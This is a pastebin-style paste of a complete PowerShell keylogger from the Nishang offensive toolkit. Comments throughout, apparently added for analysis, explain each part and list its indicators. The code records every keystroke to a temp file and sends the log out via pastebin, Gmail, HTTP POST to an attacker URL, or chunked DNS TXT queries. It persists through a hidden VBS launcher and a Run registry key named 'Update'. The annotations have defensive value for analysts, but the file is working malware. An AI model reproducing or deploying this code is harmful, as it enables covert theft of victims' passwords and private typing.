dev247

keylogger

Feb 10th, 2017
  1. <#
  2. .SYNOPSIS
  3. Nishang Payload which logs keys.
  4.  
  5. .DESCRIPTION
  6. This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
  7. The keys are then pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded
  8. using the Parse_Key script in nishang.
  9.  
  10. .PARAMETER persist
  11. Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
  12.  
  13. .PARAMETER ExfilOption
  14. The method you want to use for exfiltration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
  15.  
  16. .PARAMETER dev_key
  17. The Unique API key provided by pastebin when you register a free account.
  18. Unused for other options
  19.  
  20. .PARAMETER username
  21. Username for the pastebin/gmail account where data would be exfiltrated.
  22. Unused for other options
  23.  
  24. .PARAMETER password
  25. Password for the pastebin/gmail account where data would be exfiltrated.
  26. Unused for other options
  27.  
  28. .PARAMETER URL
  29. The URL of the webserver where POST requests would be sent.
  30.  
  31. .PARAMETER DomainName
  32. The DomainName, whose subdomains would be used for sending TXT queries to.
  33.  
  34. .PARAMETER AuthNS
  35. Authoritative Name Server for the domain specified in DomainName
  36.  
  37. .PARAMETER MagicString
  38. The string which when found at CheckURL will stop the keylogger.
  39.  
  40. .PARAMETER CheckURL
  41. The URL which would contain the MagicString used to stop keylogging.
  42.  
  43. .EXAMPLE
  44. PS > .\Keylogger.ps1
  45. The payload will ask for all required options.
  46.  
  47. .EXAMPLE
  48. PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis
  49. Use above when using the payload from non-interactive shells and no exfiltration is required.
  50.  
  51. .EXAMPLE
  52. PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php
  53. Use above for exfiltration to a webserver which logs POST requests
  54.  
  55.  
  56. .EXAMPLE
  57. PS > .\Keylogger.ps1 -persist
  58.  
  59. Use above for reboot persistence.
  60.  
  61. .LINK
  62. http://labofapenetrationtester.com/
  63. https://github.com/samratashok/nishang
  64. #>
  65.  
  # Script parameters.  Two parameter sets are declared: "noexfil" (the default, which
  # only defines -CheckURL and -MagicString) and "exfil" (which additionally exposes
  # -persist, -exfil and the exfiltration settings).  The "null" defaults are literal
  # strings, so an option that is not supplied is still forwarded to the worker job
  # below as the text "null" rather than as an empty value.
  66.     [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
  67.         [Parameter(Parametersetname="exfil")]
  68.         [Switch]
  69.         $persist,
  70.  
  71.         [Parameter(Parametersetname="exfil")]
  72.         [Switch]
  73.         $exfil,
  74.  
  75.         [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
  76.         [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
  77.         [String]
  78.         $CheckURL,
  79.  
  80.         [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
  81.         [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
  82.         [String]
  83.         $MagicString,
  84.  
  85.         [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
  86.         [String]
  87.         $ExfilOption,
  88.  
  89.         [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
  90.         [String]
  91.         $dev_key = "null",
  92.  
  93.         [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
  94.         [String]
  95.         $username = "null",
  96.  
  97.         [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
  98.         [String]
  99.         $password = "null",
  100.  
  101.         [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
  102.         [String]
  103.         $URL = "null",
  104.      
  105.         [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
  106.         [String]
  107.         $DomainName = "null",
  108.  
  109.         [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
  110.         [String]
  111.         $AuthNS = "null"  
  112.    
  113.     )
  114.  
  115.  
  116.  
  # Scriptblock holding the two worker functions.  It is passed to Start-Job as the
  # -InitializationScript further down, and in -persist mode its text is written to a
  # file under $env:TEMP so the same code is re-launched at logon.
  117. $functions =  {
  118.  
  # Keylogger: polls keyboard state and appends raw virtual-key codes to
  # $env:temp\key.log until the content fetched from CheckURL equals MagicString.
  119. function script:Keylogger
  120. {
  121.     Param (
  122.         [Parameter(Position = 0, Mandatory = $True)]
  123.         [String]
  124.         $MagicString,
  125.  
  126.         [Parameter(Position = 1, Mandatory = $True)]
  127.         [String]
  128.         $CheckURL
  129.     )
  130.    
       # P/Invoke stub for user32!GetAsyncKeyState, compiled at run time by Add-Type.
  131.     $signature = @"
  132.    [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  133.    public static extern short GetAsyncKeyState(int virtualKeyCode);
  134. "@
  135.     $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
       # Iteration counter; the stop condition is only checked every 6000 passes.
  136.     $check = 0
  137.     while ($true)
  138.     {
  139.         Start-Sleep -Milliseconds 40
  140.         $logged = ""
  141.         $result=""
  142.         $shift_state=""
  143.         $caps_state=""
       # Scan every virtual-key code 1..254; a return value of -32767 is treated as a key press.
  144.         for ($char=1;$char -le 254;$char++)
  145.         {
  146.             $vkey = $char
  147.             $logged = $getKeyState::GetAsyncKeyState($vkey)
  148.             if ($logged -eq -32767)
  149.             {
  150.                 if(($vkey -ge 48) -and ($vkey -le 57))
  151.                 {
                     # Digits (VK 48..57): "S-" prefix when either shift key (VK 160/161) is held.
  152.                     $left_shift_state = $getKeyState::GetAsyncKeyState(160)
  153.                     $right_shift_state = $getKeyState::GetAsyncKeyState(161)
  154.                         if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
  155.                         {
  156.                             $result = "S-" + $vkey
  157.                         }
  158.                         else
  159.                         {
  160.                             $result = $vkey
  161.                         }
  162.                     }
  163.                 elseif(($vkey -ge 64) -and ($vkey -le 90))
  164.                 {
                     # Letters (VK 64..90 as written): the "S-" prefix is derived from the
                     # shift keys combined with [console]::CapsLock.
  165.                     $left_shift_state = $getKeyState::GetAsyncKeyState(160)
  166.                     $right_shift_state = $getKeyState::GetAsyncKeyState(161)
  167.                     $caps_state = [console]::CapsLock
  168.                     if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
  169.                     {
  170.                         $result = "S-" + $vkey
  171.                     }
  172.                     else
  173.                     {
  174.                         $result = $vkey
  175.                     }
  176.                 }
  177.                 elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
  178.                 {
                     # Punctuation ranges (VK 186..192, 219..222): same shift handling as digits.
  179.                     $left_shift_state = $getKeyState::GetAsyncKeyState(160)
  180.                     $right_shift_state = $getKeyState::GetAsyncKeyState(161)
  181.                     if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
  182.                     {
  183.                         $result = "S-" + $vkey
  184.                     }
  185.                     else
  186.                     {
  187.                       $result = $vkey
  188.                     }
  189.                 }
  190.                 else
  191.                 {
                     # Every other key code is logged as-is.
  192.                     $result = $vkey
  193.                 }
                 # $now is assigned here but not used in this function.
  194.                 $now = Get-Date;
  195.                 $logLine = "$result "
                 # Primary on-disk artifact: each key code is appended to key.log in the
                 # user's temp directory; nothing is ever removed from it by this function.
  196.                 $filename = "$env:temp\key.log"
  197.                 Out-File -FilePath $fileName -Append -InputObject "$logLine"
  198.  
  199.             }
  200.         }
  201.         $check++
           # Stop check: every 6000 passes (at least ~4 minutes at 40 ms each) download
           # CheckURL over HTTP and leave the loop when its body equals MagicString.
  202.         if ($check -eq 6000)
  203.         {
  204.             $webclient = New-Object System.Net.WebClient
  205.             $filecontent = $webclient.DownloadString("$CheckURL")
  206.             if ($filecontent -eq $MagicString)
  207.             {
  208.                 break
  209.             }
  210.             $check = 0
  211.         }
  212.     }
  213. }
  214.  
       # Keypaste: every 5 seconds reads key.log and sends its content out over the
       # channel selected by -ExfilOption; stops on the same CheckURL/MagicString signal.
  215.     function Keypaste
  216.     {
  217.         Param (
  218.             [Parameter(Position = 0, Mandatory = $True)]
  219.             [String]
  220.             $ExfilOption,
  221.        
  222.             [Parameter(Position = 1, Mandatory = $True)]
  223.             [String]
  224.             $dev_key,
  225.        
  226.             [Parameter(Position = 2, Mandatory = $True)]
  227.             [String]
  228.             $username,
  229.  
  230.             [Parameter(Position = 3, Mandatory = $True)]
  231.             [String]
  232.             $password,
  233.        
  234.             [Parameter(Position = 4, Mandatory = $True)]
  235.             [String]
  236.             $URL,
  237.  
  238.             [Parameter(Position = 5, Mandatory = $True)]
  239.             [String]
  240.             $AuthNS,
  241.  
  242.             [Parameter(Position = 6, Mandatory = $True)]
  243.             [String]
  244.             $MagicString,
  245.        
  246.             [Parameter(Position = 7, Mandatory = $True)]
  247.             [String]
  248.             $CheckURL
  249.         )
  250.  
           # Iteration counter; the stop condition is only checked every 6000 passes.
  251.         $check = 0
  252.         while($true)
  253.         {
  254.             $read = 0
  255.             Start-Sleep -Seconds 5
               # Reads the whole key log written by Keylogger on each pass.
  256.             $pastevalue=Get-Content $env:temp\key.log
  257.             $read++
  258.             if ($read -eq 30)
  259.             {
  260.                 Out-File -FilePath $env:temp\key.log -Force -InputObject " "
  261.                 $read = 0
  262.             }
  263.             $now = Get-Date;
  264.             $name = $env:COMPUTERNAME
               # Paste title / mail subject: "<COMPUTERNAME> : <UTC timestamp>".
  265.             $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
               # Helper: synchronous HTTP POST through the Msxml2.XMLHTTP COM object.  The
               # response body is stored in $script:session_key, which the pastebin branch
               # then sends as api_user_key.
  266.             function post_http($url,$parameters)
  267.             {
  268.                 $http_request = New-Object -ComObject Msxml2.XMLHTTP
  269.                 $http_request.open("POST", $url, $false)
  270.                 $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
  271.                 $http_request.setRequestHeader("Content-length", $parameters.length);
  272.                 $http_request.setRequestHeader("Connection", "close")
  273.                 $http_request.send($parameters)
  274.                 $script:session_key=$http_request.responseText
  275.             }
  276.  
               # Helper: Deflate-compress the lines currently held in $pastevalue (read from
               # the enclosing scope) and return them base64-encoded.
  277.             function Compress-Encode
  278.             {
  279.                 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
  280.                 $ms = New-Object IO.MemoryStream
  281.                 $action = [IO.Compression.CompressionMode]::Compress
  282.                 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
  283.                 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
  284.                 $pastevalue | ForEach-Object {$sw.WriteLine($_)}
  285.                 $sw.Close()
  286.                 # Base64 encode stream
  287.                 $code = [Convert]::ToBase64String($ms.ToArray())
  288.                 return $code
  289.             }
  290.  
  291.             if ($exfiloption -eq "pastebin")
  292.             {
                   # Pastebin channel: logs in with the account credentials carried in the
                   # POST body, then creates a private paste (api_paste_private=2).
  293.                 $utfbytes  = [System.Text.Encoding]::UTF8.GetBytes($Data)
  294.                 $pastevalue = [System.Convert]::ToBase64String($utfbytes)
  295.                 post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
  296.                 post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
  297.             }
  298.        
  299.             elseif ($exfiloption -eq "gmail")
  300.             {
                   # Gmail channel: mails the log to the same account over smtp.gmail.com with
                   # SSL, authenticating with the supplied username/password; a file is
                   # attached only when $filename is set in this scope.
  301.                 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
  302.                 $smtpserver = "smtp.gmail.com"
  303.                 $msg = new-object Net.Mail.MailMessage
  304.                 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
  305.                 $smtp.EnableSsl = $True
  306.                 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
  307.                 $msg.From = "$username@gmail.com"
  308.                 $msg.To.Add("$username@gmail.com")
  309.                 $msg.Subject = $pastename
  310.                 $msg.Body = $pastevalue
  311.                 if ($filename)
  312.                 {
  313.                     $att = new-object Net.Mail.Attachment($filename)
  314.                     $msg.Attachments.Add($att)
  315.                 }
  316.                 $smtp.Send($msg)
  317.             }
  318.  
  319.             elseif ($exfiloption -eq "webserver")
  320.             {
                   # WebServer channel: POSTs the compressed, base64-encoded log as the raw
                   # request body to $URL.
  321.                 $Data = Compress-Encode    
  322.                 post_http $URL $Data
  323.             }
  324.             elseif ($ExfilOption -eq "DNS")
  325.             {
                   # DNS channel: splits the base64 blob into 63-character labels and issues one
                   # nslookup TXT query per chunk for <chunk>.<DomainName> via Invoke-Expression,
                   # so nslookup.exe is spawned as a child of the PowerShell process running
                   # this job once per chunk.
  326.                 $lengthofsubstr = 0
  327.                 $code = Compress-Encode
  328.                 $queries = [int]($code.Length/63)
  329.                 while ($queries -ne 0)
  330.                 {
  331.                     $querystring = $code.Substring($lengthofsubstr,63)
  332.                     Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
  333.                     $lengthofsubstr += 63
  334.                     $queries -= 1
  335.                 }
                   # Remaining tail shorter than 63 characters goes out as a final query.
  336.                 $mod = $code.Length%63
  337.                 $query = $code.Substring($code.Length - $mod, $mod)
  338.                 Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
  339.  
  340.             }
  341.  
  342.             $check++
               # Stop check: every 6000 passes (roughly 8 hours at 5 s each) compare the
               # content of CheckURL with MagicString and leave the loop on a match.
  343.             if ($check -eq 6000)
  344.             {
  345.                 $check = 0
  346.                 $webclient = New-Object System.Net.WebClient
  347.                 $filecontent = $webclient.DownloadString("$CheckURL")
  348.                 if ($filecontent -eq $MagicString)
  349.                 {
  350.                     break
  351.                 }
  352.             }
  353.         }
  354.     }
  355. }
  356.  
  357.  
  358.  
  # Entry point.  With -persist the payload is installed for re-execution at user
  # logon; otherwise the worker functions are started as background jobs in this session.
  359.     $modulename = $script:MyInvocation.MyCommand.Name
  360.     if($persist -eq $True)
  361.     {
           # Persistence branch.  Artifacts it leaves behind:
           #   - $env:TEMP\<script name>: a copy of the $functions block followed by the two
           #     Start-Job lines ($options / $options2);
           #   - $env:TEMP\persist.vbs: launches that copy with
           #     "powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file ...";
           #   - HKCU\Software\Microsoft\Windows\CurrentVersion\Run value "Update" pointing
           #     at persist.vbs.
           # The Run value, the .vbs in %TEMP%, and the hidden PowerShell launch with
           # -executionpolicy bypass are the observable indicators of this branch.
  362.         $name = "persist.vbs"
  363.         $options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)"
  364.         $options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)"
  365.         $func = $functions.Tostring()
  366.         Out-File -InputObject '$functions =  {' -Force $env:TEMP\$modulename
  367.         Out-File -InputObject $func -Append $env:TEMP\$modulename
  368.         Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename
  369.         Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename
  370.         Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename
  371.            
  372.         New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
  373.         echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
  374.         echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
  375.  
  376.     }  
  377.  
  378.     else
  379.     {
           # Non-persistent mode: Keypaste runs only when -exfil was given; Keylogger always
           # runs.  Both are Start-Job background jobs initialised with $functions.
  380.         if ($exfil -eq $True)
  381.         {
  382.             start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
  383.             start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
  384.         }
  385.         else
  386.         {
  387.             start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
  388.         }
  389.     }